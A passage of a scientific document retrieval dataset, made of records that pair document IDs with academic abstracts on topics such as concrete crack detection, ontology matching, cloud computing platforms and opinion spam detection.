"text": "In maintenance of concrete structures, crack detection is important for the inspection and diagnosis of concrete structures. However, it is difficult to detect cracks automatically. In this paper, we propose a robust automatic crack-detection method from noisy concrete surface images. The proposed method includes two preprocessing steps and two detection steps. The first preprocessing step is a subtraction process using the median filter to remove slight variations like shadings from concrete surface images; only an original image is used in the preprocessing. In the second preprocessing step, a multi-scale line filter with the Hessian matrix is used both to emphasize cracks against blebs or stains and to adapt the width variation of cracks. After the preprocessing, probabilistic relaxation is used to detect cracks coarsely and to prevent noises. It is unnecessary to optimize any parameters in probabilistic relaxation. Finally, using the results from the relaxation process, a locally adaptive thresholding is performed to detect cracks more finely. We evaluate robustness and accuracy of the proposed method quantitatively using 60 actual noisy concrete surface images.",
"title": ""
},
{
"docid": "5dce9610b3985fb7d9628d4c201ef66e",
"text": "The recent advances in state estimation, perception, and navigation algorithms have significantly contributed to the ubiquitous use of quadrotors for inspection, mapping, and aerial imaging. To further increase the versatility of quadrotors, recent works investigated the use of an adaptive morphology, which consists of modifying the shape of the vehicle during flight to suit a specific task or environment. However, these works either increase the complexity of the platform or decrease its controllability. In this letter, we propose a novel, simpler, yet effective morphing design for quadrotors consisting of a frame with four independently rotating arms that fold around the main frame. To guarantee stable flight at all times, we exploit an optimal control strategy that adapts on the fly to the drone morphology. We demonstrate the versatility of the proposed adaptive morphology in different tasks, such as negotiation of narrow gaps, close inspection of vertical surfaces, and object grasping and transportation. The experiments are performed on an actual, fully autonomous quadrotor relying solely on onboard visual-inertial sensors and compute. No external motion tracking systems and computers are used. This is the first work showing stable flight without requiring any symmetry of the morphology.",
"title": ""
},
{
"docid": "b5c65533fd768b9370d8dc3aba967105",
"text": "Agent-based complex systems are dynamic networks of many interacting agents; examples include ecosystems, financial markets, and cities. The search for general principles underlying the internal organization of such systems often uses bottom-up simulation models such as cellular automata and agent-based models. No general framework for designing, testing, and analyzing bottom-up models has yet been established, but recent advances in ecological modeling have come together in a general strategy we call pattern-oriented modeling. This strategy provides a unifying framework for decoding the internal organization of agent-based complex systems and may lead toward unifying algorithmic theories of the relation between adaptive behavior and system complexity.",
"title": ""
},
{
"docid": "47b5e127b64cf1842841afcdb67d6d84",
"text": "This work describes the aerodynamic characteristic for aircraft wing model with and without bird feather like winglet. The aerofoil used to construct the whole structure is NACA 653-218 Rectangular wing and this aerofoil has been used to compare the result with previous research using winglet. The model of the rectangular wing with bird feather like winglet has been fabricated using polystyrene before design using CATIA P3 V5R13 software and finally fabricated in wood. The experimental analysis for the aerodynamic characteristic for rectangular wing without winglet, wing with horizontal winglet and wing with 60 degree inclination winglet for Reynolds number 1.66×10, 2.08×10 and 2.50×10 have been carried out in open loop low speed wind tunnel at the Aerodynamics laboratory in Universiti Putra Malaysia. The experimental result shows 25-30 % reduction in drag coefficient and 10-20 % increase in lift coefficient by using bird feather like winglet for angle of attack of 8 degree. Keywords—Aerofoil, Wind tunnel, Winglet, Drag Coefficient.",
"title": ""
},
{
"docid": "78b7987361afd8c7814ee416c81a311b",
"text": "This paper presents the characterization of various types of SubMiniature version A (SMA) connectors. The characterization is performed by measurements in frequency and time domain. The SMA connectors are mounted on microstrip (MS) and conductor-backed coplanar waveguide (CPW-CB) manufactured on high-frequency (HF) laminates. The designed characteristic impedance of the transmission lines is 50 Ω and deviation from the designed characteristic impedance is measured. The measurement results suggest that for a given combination of the transmission line and SMA connector, the discontinuity in terms of characteristic impedance can be significantly improved by choosing the right connector type.",
"title": ""
},
{
"docid": "088308b06392780058dd8fa1686c5c35",
"text": "Every company should be able to demonstrate own efficiency and effectiveness by used metrics or other processes and standards. Businesses may be missing a direct comparison with competitors in the industry, which is only possible using appropriately chosen instruments, whether financial or non-financial. The main purpose of this study is to describe and compare the approaches of the individual authors. to find metric from reviewed studies which organization use to measuring own marketing activities with following separating into financial metrics and non-financial metrics. The paper presents advance in useable metrics, especially financial and non-financial metrics. Selected studies, focusing on different branches and different metrics, were analyzed by the authors. The results of the study is describing relevant metrics to prove efficiency in varied types of organizations in connection with marketing effectiveness. The studies also outline the potential methods for further research focusing on the application of metrics in a diverse environment. The study contributes to a clearer idea of how to measure performance and effectiveness.",
"title": ""
},
{
"docid": "0305bac1e39203b49b794559bfe0b376",
"text": "The emerging field of semantic web technologies promises new stimulus for Software Engineering research. However, since the underlying concepts of the semantic web have a long tradition in the knowledge engineering field, it is sometimes hard for software engineers to overlook the variety of ontology-enabled approaches to Software Engineering. In this paper we therefore present some examples of ontology applications throughout the Software Engineering lifecycle. We discuss the advantages of ontologies in each case and provide a framework for classifying the usage of ontologies in Software Engineering.",
"title": ""
},
{
"docid": "86eefd1336d047e16b49297ae628cb6a",
"text": "Applications of digital signature technology are on the rise because of legal and technological developments, along with strong market demand for secured transactions on the Internet. In order to predict the future demand for digital signature products and online security, it is important to understand the application development trends in digital signature technology. This comparative study across various modes of e-business indicates that the majority of digital signature applications have been developed for the Business-to-Business (B2B) mode of e-business. This study also indicates a slow adoption rate of digital signature products by governments and the potential for their rapid growth in the Business-to-Consumer (B2C) mode of e-business. These developments promise to provide a robust security infrastructure for online businesses, which may promote e-business further in the future.",
"title": ""
},
{
"docid": "e2de274128ec75d25d9353fc7534eeca",
"text": "A central prerequisite to understand the phenomenon of art in psychological terms is to investigate the nature of the underlying perceptual and cognitive processes. Building on a study by Augustin, Leder, Hutzler, and Carbon (2008) the current ERP study examined the neural time course of two central aspects of representational art, one of which is closely related to object- and scene perception, the other of which is art-specific: content and style. We adapted a paradigm that has repeatedly been employed in psycholinguistics and that allows one to examine the neural time course of two processes in terms of when sufficient information is available to allow successful classification. Twenty-two participants viewed pictures that systematically varied in style and content and conducted a combined go/nogo dual choice task. The dependent variables of interest were the Lateralised Readiness Potential (LRP) and the N200 effect. Analyses of both measures support the notion that in the processing of art style follows content, with style-related information being available at around 224 ms or between 40 and 94 ms later than content-related information. The paradigm used here offers a promising approach to further explore the time course of art perception, thus helping to unravel the perceptual and cognitive processes that underlie the phenomenon of art and the fascination it exerts.",
"title": ""
},
{
"docid": "dc5f111bfe7fa27ae7e9a4a5ba897b51",
"text": "We propose AffordanceNet, a new deep learning approach to simultaneously detect multiple objects and their affordances from RGB images. Our AffordanceNet has two branches: an object detection branch to localize and classify the object, and an affordance detection branch to assign each pixel in the object to its most probable affordance label. The proposed framework employs three key components for effectively handling the multiclass problem in the affordance mask: a sequence of deconvolutional layers, a robust resizing strategy, and a multi-task loss function. The experimental results on the public datasets show that our AffordanceNet outperforms recent state-of-the-art methods by a fair margin, while its end-to-end architecture allows the inference at the speed of 150ms per image. This makes our AffordanceNet well suitable for real-time robotic applications. Furthermore, we demonstrate the effectiveness of AffordanceNet in different testing environments and in real robotic applications. The source code is available at https://github.com/nqanh/affordance-net.",
"title": ""
}
] | scidocsrr |
4b4b0c408c230f46882a7e01e72cd029 | Comparison of open-source cloud management platforms: OpenStack and OpenNebula | [
{
"docid": "84cb130679353dbdeff24100409f57fe",
"text": "Cloud computing has become another buzzword after Web 2.0. However, there are dozens of different definitions for cloud computing and there seems to be no consensus on what a cloud is. On the other hand, cloud computing is not a completely new concept; it has intricate connection to the relatively new but thirteen-year established grid computing paradigm, and other relevant technologies such as utility computing, cluster computing, and distributed systems in general. This paper strives to compare and contrast cloud computing with grid computing from various angles and give insights into the essential characteristics of both.",
"title": ""
},
{
"docid": "52348982bb1a9dcea3070d9b556ef987",
"text": "Cloud computing is the development of parallel computing, distributed computing and grid computing. It has been one of the most hot research topics. Now many corporations have involved in the cloud computing related techniques and many cloud computing platforms have been put forward. This is a favorable situation to study and application of cloud computing related techniques. Though interesting, there are also some problems for so many flatforms. For to a novice or user with little knowledge about cloud computing, it is still very hard to make a reasonable choice. What differences are there for different cloud computing platforms and what characteristics and advantages each has? To answer these problems, the characteristics, architectures and applications of several popular cloud computing platforms are analyzed and discussed in detail. From the comparison of these platforms, users can better understand the different cloud platforms and more reasonablely choose what they want.",
"title": ""
}
] | [
{
"docid": "2a4822a0cd5022b0ca6f603b2279933d",
"text": "The products reviews are increasingly used by individuals and organizations for purchase and business decisions. Driven by the desire of profit, spammers produce synthesized reviews to promote some products or demote competitors products. So deceptive opinion spam detection has attracted significant attention from both business and research communities in recent years. Existing approaches mainly focus on traditional discrete features, which are based on linguistic and psychological cues. However, these methods fail to encode the semantic meaning of a document from the discourse perspective, which limits the performance. In this work, we empirically explore a neural network model to learn document-level representation for detecting deceptive opinion spam. First, the model learns sentence representation with convolutional neural network. Then, sentence representations are combined using a gated recurrent neural network, which can model discourse information and yield a document vector. Finally, the document representations are directly used as features to identify deceptive opinion spam. Based on three domains datasets, the results on in-domain and cross-domain experiments show that our proposed method outperforms state-of-the-art methods. © 2017 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "3bfeb0096c0255aee35001c23acb2057",
"text": "Tensegrity structures, isolated solid rods connected by tensile cables, are of interest in the field of soft robotics due to their flexible and robust nature. This makes them suitable for uneven and unpredictable environments in which traditional robots struggle. The compliant structure also ensures that the robot will not injure humans or delicate equipment in co-robotic applications [1]. A 6-bar tensegrity structure is being used as the basis for a new generation of robotic landers and rovers for space exploration [1]. In addition to a soft tensegrity structure, we are also exploring use of soft sensors as an integral part of the compliant elements. Fig. 1 shows an example of a 6-bar tensegrity structure, with integrated liquid metalembedded hyperelastic strain sensors as the 24 tensile components. For this tensegrity, the strain sensors are primarily composed of a silicone elastomer with embedded microchannels filled with conductive liquid metal (eutectic gallium indium alloy (eGaIn), Sigma-Aldrich) (fig.2). As the sensor is elongated, the resistance of the eGaIn channel will increase due to the decreased microchannel cross-sectional area and the increased microchannel length [2]. The primary functions of this hyperelastic sensor tensegrity are model validation, feedback control, and structure analysis under payload. Feedback from the sensors can be used for experimental validation of existing models of tensegrity structures and dynamics, such as for the NASA Tensegrity Robotics Toolkit [3]. In addition, the readings from the sensors can provide distance changed between the ends of the bars, which can be used as a state estimator for UC Berkeley’s rapidly prototyped tensegrity robot to perform feedback control [1]. Furthermore, this physical model allows us to observe and record the force distribution and structure deformation with different payload conditions. Currently, we are exploring the possibility of integrating shape memory alloys into the hyperelastic sensors, which can provide the benefit of both actuation and sensing in a compact module. Preliminary tests indicate that this combination has the potential to generate enough force and displacement to achieve punctuated rolling motion for the 6-bar tensegrity structure.",
"title": ""
},
{
"docid": "1e5073e73c371f1682d95bb3eedaf7f4",
"text": "Investigation into robot-assisted intervention for children with autism spectrum disorder (ASD) has gained momentum in recent years. Therapists involved in interventions must overcome the communication impairments generally exhibited by children with ASD by adeptly inferring the affective cues of the children to adjust the intervention accordingly. Similarly, a robot must also be able to understand the affective needs of these children-an ability that the current robot-assisted ASD intervention systems lack-to achieve effective interaction that addresses the role of affective states in human-robot interaction and intervention practice. In this paper, we present a physiology-based affect-inference mechanism for robot-assisted intervention where the robot can detect the affective states of a child with ASD as discerned by a therapist and adapt its behaviors accordingly. This paper is the first step toward developing ldquounderstandingrdquo robots for use in future ASD intervention. Experimental results with six children with ASD from a proof-of-concept experiment (i.e., a robot-based basketball game) are presented. The robot learned the individual liking level of each child with regard to the game configuration and selected appropriate behaviors to present the task at his/her preferred liking level. Results show that the robot automatically predicted individual liking level in real time with 81.1% accuracy. This is the first time, to our knowledge, that the affective states of children with ASD have been detected via a physiology-based affect recognition technique in real time. This is also the first time that the impact of affect-sensitive closed-loop interaction between a robot and a child with ASD has been demonstrated experimentally.",
"title": ""
},
{
"docid": "116ae1a8d8d8cb5a776ab665a6fc1c8c",
"text": "A low noise transimpedance amplifier (TIA) is used in radiation detectors to transform the current pulse produced by a photo-sensitive device into an output voltage pulse with a specified amplitude and shape. We consider here the specifications of a PET (positron emission tomography) system. We review the traditional approach, feedback TIA, using an operational amplifier with feedback, and we investigate two alternative circuits: the common-gate TIA, and the regulated cascode TIA. We derive the transimpedance function (the poles of which determine the pulse shaping); we identify the transistor in each circuit that has the dominant noise source, and we obtain closed-form equations for the rms output noise voltage. We find that the common-gate TIA has high noise, but the regulated cascode TIA has the same dominant noise contribution as the feedback TIA, if the same maximum transconductance value is considered. A circuit prototype of a regulated cascode TIA is designed in a 0.35 μm CMOS technology, to validate the theoretical results by simulation and by measurement.",
"title": ""
},
{
"docid": "9d34171c2fcc8e36b2fb907fe63fc08d",
"text": "A novel approach to view-based eye gaze tracking for human computer interface (HCI) is presented. The proposed method combines different techniques to address the problems of head motion, illumination and usability in the framework of low cost applications. Feature detection and tracking algorithms have been designed to obtain an automatic setup and strengthen the robustness to light conditions. An extensive analysis of neural solutions has been performed to deal with the non-linearity associated with gaze mapping under free-head conditions. No specific hardware, such as infrared illumination or high-resolution cameras, is needed, rather a simple commercial webcam working in visible light spectrum suffices. The system is able to classify the gaze direction of the user over a 15-zone graphical interface, with a success rate of 95% and a global accuracy of around 2 degrees , comparable with the vast majority of existing remote gaze trackers.",
"title": ""
},
{
"docid": "00579ac3e9336b60016f931df6ab2c34",
"text": "Often presented as competing products on the market of low cost 3D sensors, the Kinect™ and the Leap Motion™ (LM) can actually be complementary in some scenario. We promote, in this paper, the fusion of data acquired by both LM and Kinect sensors to improve hand tracking performances. The sensor fusion is applied to an existing augmented reality system targeting the treatment of phantom limb pain (PLP) in upper limb amputees. With the Kinect we acquire 3D images of the patient in real-time. These images are post-processed to apply a mirror effect along the sagittal plane of the body, before being displayed back to the patient in 3D, giving him the illusion that he has two arms. The patient uses the virtual reconstructed arm to perform given tasks involving interactions with virtual objects. Thanks to the plasticity of the brain, the restored visual feedback of the missing arm allows, in some cases, to reduce the pain intensity. The Leap Motion brings to the system the ability to perform accurate motion tracking of the hand, including the fingers. By registering the position and orientation of the LM in the frame of reference of the Kinect, we make our system able to accurately detect interactions of the hand and the fingers with virtual objects, which will greatly improve the user experience. We also show that the sensor fusion nicely extends the tracking domain by supplying finger positions even when the Kinect sensor fails to acquire the depth values for the hand.",
"title": ""
},
{
"docid": "9f16e90dc9b166682ac9e2a8b54e611a",
"text": "Lua is a programming language designed as scripting language, which is fast, lightweight, and suitable for embedded applications. Due to its features, Lua is widely used in the development of games and interactive applications for digital TV. However, during the development phase of such applications, some errors may be introduced, such as deadlock, arithmetic overflow, and division by zero. This paper describes a novel verification approach for software written in Lua, using as backend the Efficient SMTBased Context-Bounded Model Checker (ESBMC). Such an approach, called bounded model checking - Lua (BMCLua), consists in translating Lua programs into ANSI-C source code, which is then verified with ESBMC. Experimental results show that the proposed verification methodology is effective and efficient, when verifying safety properties in Lua programs. The performed experiments have shown that BMCLua produces an ANSI-C code that is more efficient for verification, when compared with other existing approaches. To the best of our knowledge, this work is the first that applies bounded model checking to the verification of Lua programs.",
"title": ""
},
{
"docid": "d287a48936f60ac81b1d27f0885b5360",
"text": "In this article, we are interested in implementing mixed-criticality real-time embedded applications on a given heterogeneous distributed architecture. Applications have different criticality levels, captured by their Safety-Integrity Level (SIL), and are scheduled using static-cyclic scheduling. According to certification standards, mixed-criticality tasks can be integrated onto the same architecture only if there is enough spatial and temporal separation among them. We consider that the separation is provided by partitioning, such that applications run in separate partitions, and each partition is allocated several time slots on a processor. Tasks of different SILs can share a partition only if they are all elevated to the highest SIL among them. Such elevation leads to increased development costs, which increase dramatically with each SIL. Tasks of higher SILs can be decomposed into redundant structures of lower SIL tasks. We are interested to determine (i) the mapping of tasks to processors, (ii) the assignment of tasks to partitions, (iii) the decomposition of tasks into redundant lower SIL tasks, (iv) the sequence and size of the partition time slots on each processor, and (v) the schedule tables, such that all the applications are schedulable and the development costs are minimized. We have proposed a Tabu Search-based approach to solve this optimization problem. The proposed algorithm has been evaluated using several synthetic and real-life benchmarks.",
"title": ""
},
{
"docid": "d75ebc4041927b525d8f4937c760518e",
"text": "Most current term frequency normalization approaches for information retrieval involve the use of parameters. The tuning of these parameters has an important impact on the overall performance of the information retrieval system. Indeed, a small variation in the involved parameter(s) could lead to an important variation in the precision/recall values. Most current tuning approaches are dependent on the document collections. As a consequence, the effective parameter value cannot be obtained for a given new collection without extensive training data. In this paper, we propose a novel and robust method for the tuning of term frequency normalization parameter(s), by measuring the normalization effect on the within document frequency of the query terms. As an illustration, we apply our method on Amati \\& Van Rijsbergen's so-called normalization 2. The experiments for the ad-hoc TREC-6,7,8 tasks and TREC-8,9,10 Web tracks show that the new method is independent of the collections and able to provide reliable and good performance.",
"title": ""
},
{
"docid": "cbdbe103bcc85f76f9e6ac09eed8ea4c",
"text": "Using the evidence collection and analysis methodology for Android devices proposed by Martini, Do and Choo (2015), we examined and analyzed seven popular Android cloud-based apps. Firstly, we analyzed each app in order to see what information could be obtained from their private app storage and SD card directories. We collated the information and used it to aid our investigation of each app’s database files and AccountManager data. To complete our understanding of the forensic artefacts stored by apps we analyzed, we performed further analysis on the apps to determine if the user’s authentication credentials could be collected for each app based on the information gained in the initial analysis stages. The contributions of this research include a detailed description of artefacts, which are of general forensic interest, for each app analyzed.",
"title": ""
},
{
"docid": "eebf03df49eb4a99f61d371e059ef43e",
"text": "In theoretical cognitive science, there is a tension between highly structured models whose parameters have a direct psychological interpretation and highly complex, general-purpose models whose parameters and representations are difficult to interpret. The former typically provide more insight into cognition but the latter often perform better. This tension has recently surfaced in the realm of educational data mining, where a deep learning approach to estimating student proficiency, termed deep knowledge tracing or DKT [17], has demonstrated a stunning performance advantage over the mainstay of the field, Bayesian knowledge tracing or BKT [3].",
"title": ""
},
{
"docid": "7263779123a0894f6d7eb996d631f007",
"text": "The sudden infant death syndrome (SIDS) is postulated to result from a failure of homeostatic responses to life-threatening challenges (e.g. asphyxia, hypercapnia) during sleep. The ventral medulla participates in sleep-related homeostatic responses, including chemoreception, arousal, airway reflex control, thermoregulation, respiratory drive, and blood pressure regulation, in part via serotonin and its receptors. The ventral medulla in humans contains the arcuate nucleus, in which we have shown isolated defects in muscarinic and kainate receptor binding in SIDS victims. We also have demonstrated that the arcuate nucleus is anatomically linked to the nucleus raphé obscurus, a medullary region with serotonergic neurons. We tested the hypothesis that serotonergic receptor binding is decreased in both the arcuate nucleus and nucleus raphé obscurus in SIDS victims. Using quantitative autoradiography, 3H-lysergic acid diethylamide (3H-LSD binding) to serotonergic receptors (5-HT1A-D and 5-HT2 subtypes) was measured blinded in 19 brainstem nuclei. Cases were classified as SIDS (n = 52), acute controls (infants who died suddenly and in whom a complete autopsy established a cause of death) (n = 15), or chronic cases with oxygenation disorders (n = 17). Serotonergic binding was significantly lowered in the SIDS victims compared with controls in the arcuate nucleus (SIDS, 6 +/- 1 fmol/mg tissue; acutes, 19 +/- 1; and chronics, 16 +/- 1; p = 0.0001) and n. raphé obscurus (SIDS, 28 +/- 3 fmol/mg tissue; acutes, 66 +/- 6; and chronics, 59 +/- 1; p = 0.0001). Binding, however, was also significantly lower (p < 0.05) in 4 other regions that are integral parts of the medullary raphé/serotonergic system, and/or are derived, like the arcuate nucleus and nucleus raphé obscurus, from the same embryonic anlage (rhombic lip). These data suggest that a larger neuronal network than the arcuate nucleus alone is involved in the pathogenesis of SIDS, that is, a network composed of inter-related serotonergic nuclei of the ventral medulla that are involved in homeostatic mechanisms, and/or are derived from a common embryonic anlage.",
"title": ""
},
{
"docid": "7813dc93e6bcda97768d87e80f8efb2b",
"text": "The inclusion of transaction costs is an essential element of any realistic portfolio optimization. In this paper, we consider an extension of the standard portfolio problem in which transaction costs are incurred to rebalance an investment portfolio. The Markowitz framework of mean-variance efficiency is used with costs modelled as a percentage of the value transacted. Each security in the portfolio is represented by a pair of continuous decision variables corresponding to the amounts bought and sold. In order to properly represent the variance of the resulting portfolio, it is necessary to rescale by the funds available after paying the transaction costs. We show that the resulting fractional quadratic programming problem can be solved as a quadratic programming problem of size comparable to the model without transaction costs. Computational results for two empirical datasets are presented.",
"title": ""
},
{
"docid": "19b16abf5ec7efe971008291f38de4d4",
"text": "Cross-modal retrieval has recently drawn much attention due to the widespread existence of multimodal data. It takes one type of data as the query to retrieve relevant data objects of another type, and generally involves two basic problems: the measure of relevance and coupled feature selection. Most previous methods just focus on solving the first problem. In this paper, we aim to deal with both problems in a novel joint learning framework. To address the first problem, we learn projection matrices to map multimodal data into a common subspace, in which the similarity between different modalities of data can be measured. In the learning procedure, the ℓ2-norm penalties are imposed on the projection matrices separately to solve the second problem, which selects relevant and discriminative features from different feature spaces simultaneously. A multimodal graph regularization term is further imposed on the projected data,which preserves the inter-modality and intra-modality similarity relationships.An iterative algorithm is presented to solve the proposed joint learning problem, along with its convergence analysis. Experimental results on cross-modal retrieval tasks demonstrate that the proposed method outperforms the state-of-the-art subspace approaches.",
"title": ""
},
{
"docid": "f58a66f2caf848341b29094e9d3b0e71",
"text": "Since student performance and pass rates in school reflect teaching level of the school and even all education system, it is critical to improve student pass rates and reduce dropout rates. Decision Tree (DT) algorithm and Support Vector Machine (SVM) algorithm in data mining, have been used by researchers to find important student features and predict the student pass rates, however they did not consider the coefficient of initialization, and whether there is a dependency between student features. Therefore, in this study, we propose a new concept: features dependencies, and use the grid search algorithm to optimize DT and SVM, in order to improve the accuracy of the algorithm. Furthermore, we added 10-fold cross-validation to DT and SVM algorithm. The results show the experiment can achieve better results in this work. The purpose of this study is providing assistance to students who have greater difficulties in their studies, and students who are at risk of graduating through data mining techniques.",
"title": ""
},
{
"docid": "8cfeb661397d6716ca7fa9954de81330",
"text": "There has been a great amount of work on query-independent summarization of documents. However, due to the success of Web search engines query-specific document summarization (query result snippets) has become an important problem, which has received little attention. We present a method to create query-specific summaries by identifying the most query-relevant fragments and combining them using the semantic associations within the document. In particular, we first add structure to the documents in the preprocessing stage and convert them to document graphs. Then, the best summaries are computed by calculating the top spanning trees on the document graphs. We present and experimentally evaluate efficient algorithms that support computing summaries in interactive time. Furthermore, the quality of our summarization method is compared to current approaches using a user survey.",
"title": ""
},
{
"docid": "bc77c4bcc60c3746a791e61951d42c78",
"text": "In this paper, a hybrid of indoor ambient light and thermal energy harvesting scheme that uses only one power management circuit to condition the combined output power harvested from both energy sources is proposed to extend the lifetime of the wireless sensor node. By avoiding the use of individual power management circuits for multiple energy sources, the number of components used in the hybrid energy harvesting (HEH) system is reduced and the system form factor, cost and power losses are thus reduced. An efficient microcontroller-based ultra low power management circuit with fixed voltage reference based maximum power point tracking is implemented with closed-loop voltage feedback control to ensure near maximum power transfer from the two energy sources to its connected electronic load over a wide range of operating conditions. From the experimental test results obtained, an average electrical power of 621 μW is harvested by the optimized HEH system at an average indoor solar irradiance of 1010 lux and a thermal gradient of 10 K, which is almost triple of that can be obtained with conventional single-source thermal energy harvesting method.",
"title": ""
},
{
"docid": "8ae12d8ef6e58cb1ac376eb8c11cd15a",
"text": "This paper surveys recent technical research on the problems of privacy and security for radio frequency identification (RFID). RFID tags are small, wireless devices that help identify objects and people. Thanks to dropping cost, they are likely to proliferate into the billions in the next several years-and eventually into the trillions. RFID tags track objects in supply chains, and are working their way into the pockets, belongings, and even the bodies of consumers. This survey examines approaches proposed by scientists for privacy protection and integrity assurance in RFID systems, and treats the social and technical context of their work. While geared toward the nonspecialist, the survey may also serve as a reference for specialist readers.",
"title": ""
},
{
"docid": "2cff00acdccfc43ed2bc35efe704f1ac",
"text": "A decision to invest in new manufacturing enabling technologies supporting computer integrated manufacturing (CIM) must include non-quantifiable, intangible benefits to the organization in meeting its strategic goals. Therefore, use of tactical level, purely economic, evaluation methods normally result in the rejection of strategically vital automation proposals. This paper includes four different fuzzy multi-attribute group decision-making methods. The first one is a fuzzy model of group decision proposed by Blin. The second is fuzzy synthetic evaluation, the third is Yager’s weighted goals method, and the last one is fuzzy analytic hierarchy process. These methods are extended to select the best computer integrated manufacturing system by taking into account both intangible and tangible factors. A computer software for these approaches is developed and finally some numerical applications of these methods are given to compare the results of all methods. # 2003 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "7f39974c1eb5dcecf2383ec9cd5abc42",
"text": "Edited volumes are an imperfect format for the presentation of ideas, not least because their goals vary. Sometimes they aim simply to survey the field, at other times to synthesize and advance the field. I prefer the former for disciplines that by their nature are not disposed to achieve definitive statements (philosophy, for example). A volume on an empirical topic, however, by my judgment falls short if it closes without firm conclusions, if not on the topic itself, at least on the state of the art of its study. Facial Attractiveness does fall short of this standard, but not for lack of serious effort (especially appreciated are such features as the summary table in Chapter 5). Although by any measure an excellent and thorough review of the major strands of its topic, the volume’s authors are often in such direct conflict that the reader is disappointed that the editors do not, in the end, provide sufficient guidance about where the most productive research avenues lie. Every contribution is persuasive, but as they cannot all be correct, who is to win the day? An obvious place to begin is with the question, What is “attractiveness”? Most writers seem unaware of the problem, and how it might impact their research methodology. What, the reader wants to know, is the most defensible conceptualization of the focal phenomenon? Often an author focuses explicitly on the aesthetic dimension of “attractive,” treating it as a synonym for “beauty.” A recurring phrase in the book is that “beauty is in the eye of the beholder,” with the authors undertaking to argue whether this standard accurately describes social reality. They reach contradictory conclusions. Chapter 1 (by Adam Rubenstein et al.) finds the maxim to be a “myth” which, by chapter’s end, is presumably dispelled; Anthony Little and his co-authors in Chapter 3, however, view their contribution as “help[ing] to place beauty back into the eye of the beholder.” Other chapters take intermediate positions. Besides the aesthetic, “attractive” can refer to raw sexual appeal, or to more long-term relationship evaluations. Which kind of attractiveness one intends will determine the proper methodology to use, and thereby impact the likely experimental results. As only one example, if one intends to investigate aesthetic attraction, the sexual orientation of the judges does not matter, whereas it matters a great deal if one intends to investigate sexual or relationship attraction. Yet no study discussed in these",
"title": ""
}
] | scidocsrr |
0af1206aa41d7c0c33f8e6f873b731a8 | A Comparative Evaluation of String Similarity Metrics for Ontology Alignment | [
{
"docid": "e42439998ac3b64d3f6653b13c75d192",
"text": "After years of research on ontology matching, it is reasonable to consider several questions: is the field of ontology matching still making progress? Is this progress significant enough to pursue further research? If so, what are the particularly promising directions? To answer these questions, we review the state of the art of ontology matching and analyze the results of recent ontology matching evaluations. These results show a measurable improvement in the field, the speed of which is albeit slowing down. We conjecture that significant improvements can be obtained only by addressing important challenges for ontology matching. We present such challenges with insights on how to approach them, thereby aiming to direct research into the most promising tracks and to facilitate the progress of the field.",
"title": ""
},
{
"docid": "d9160f2cc337de729af34562d77a042e",
"text": "Ontologies proliferate with the progress of the Semantic Web. Ontology matching is an important way of establishing interoperability between (Semantic) Web applications that use different but related ontologies. Due to their sizes and monolithic nature, large ontologies regarding real world domains bring a new challenge to the state of the art ontology matching technology. In this paper, we propose a divide-and-conquer approach to matching large ontologies. We develop a structure-based partitioning algorithm, which partitions entities of each ontology into a set of small clusters and constructs blocks by assigning RDF Sentences to those clusters. Then, the blocks from different ontologies are matched based on precalculated anchors, and the block mappings holding high similarities are selected. Finally, two powerful matchers, V-DOC and GMO, are employed to discover alignments in the block mappings. Comprehensive evaluation on both synthetic and real world data sets demonstrates that our approach both solves the scalability problem and achieves good precision and recall with significant reduction of execution time. 2008 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "4538c5874872a0081593407d09e4c6fa",
"text": "PatternAttribution is a recent method, introduced in the vision domain, that explains classifications of deep neural networks. We demonstrate that it also generates meaningful interpretations in the language domain.",
"title": ""
},
{
"docid": "bed9b5a75f79d921444feba4400c9846",
"text": "Clustering algorithms have successfully been applied as a digital image segmentation technique in various fields and applications. However, those clustering algorithms are only applicable for specific images such as medical images, microscopic images etc. In this paper, we present a new clustering algorithm called Image segmentation using K-mean clustering for finding tumor in medical application which could be applied on general images and/or specific images (i.e., medical and microscopic images), captured using MRI, CT scan, etc. The algorithm employs the concepts of fuzziness and belongingness to provide a better and more adaptive clustering process as compared to several conventional clustering algorithms.",
"title": ""
},
{
"docid": "2b66dc9e5a089d82fd0d61f5a62eb049",
"text": "Research on mindfulness indicates that it is associated with improved mental health, but the use of multiple different definitions of mindfulness prevents a clear understanding of the construct. In particular, the boundaries between different conceptualizations of mindfulness and emotion regulation are unclear. Furthermore, the mechanisms by which any of these conceptualizations of mindfulness might influence mental health are not well-understood. The two studies presented here addressed these questions using correlational, self-report data from a non-clinical sample of undergraduate students. The first study used a combination of exploratory and confirmatory factor analyses to better understand the factor structure of mindfulness and emotion regulation measures. Results indicated that these measures assess heterogeneous and overlapping constructs, and may be most accurately thought of as measuring four factors: presentcentered attention, acceptance of experience, clarity about one’s internal experience, and the ability to manage negative emotions. A path analysis supported the hypothesis that mindfulness (defined by a two-factor construct including present-centered attention and acceptance of experience) contributed to clarity about one’s experience, which improved the ability to manage negative emotions. The second study developed these findings by exploring the mediating roles of clarity about one’s internal life, the ability to manage negative emotions, non-attachment (or the extent to which one’s happiness is independent of specific outcomes and events), and rumination in the relationship between mindfulness and two aspects of mental health, psychological distress and flourishing mental health. Results confirmed the importance of these mediators in the relationship between mindfulness and mental health.",
"title": ""
},
{
"docid": "5959fac6fabf495a0af372ffb3add86f",
"text": "A versatile, platform independent and easy to use Java suite for large-scale gene expression analysis was developed. Genesis integrates various tools for microarray data analysis such as filters, normalization and visualization tools, distance measures as well as common clustering algorithms including hierarchical clustering, self-organizing maps, k-means, principal component analysis, and support vector machines. The results of the clustering are transparent across all implemented methods and enable the analysis of the outcome of different algorithms and parameters. Additionally, mapping of gene expression data onto chromosomal sequences was implemented to enhance promoter analysis and investigation of transcriptional control mechanisms.",
"title": ""
},
{
"docid": "be115d8bd86e1ef81f8056a2e97a3f01",
